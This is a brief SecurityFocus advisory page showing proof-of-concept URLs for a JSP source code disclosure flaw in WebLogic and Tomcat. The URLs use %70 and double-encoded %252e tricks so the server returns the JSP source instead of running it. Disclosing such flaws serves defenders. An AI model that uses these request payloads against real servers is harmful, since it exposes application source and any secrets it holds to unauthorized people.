Multiple Vendor URL JSP Request Source Code Disclosure Vulnerability

The following example has been provided by Sverre H. Huseby <shh@thathost.com>:

WebLogic:

http://www.example.com/index.js%70

Tomcat:

http://www.example.com/examples/jsp/num/numguess.js%70

The following variant URL for Tomcat has been provided by lovehacker <lovehacker@263.net>:

http://www.example.com/examples/snp/snoop%252ejsp


 

Privacy Statement
Copyright 2010, SecurityFocus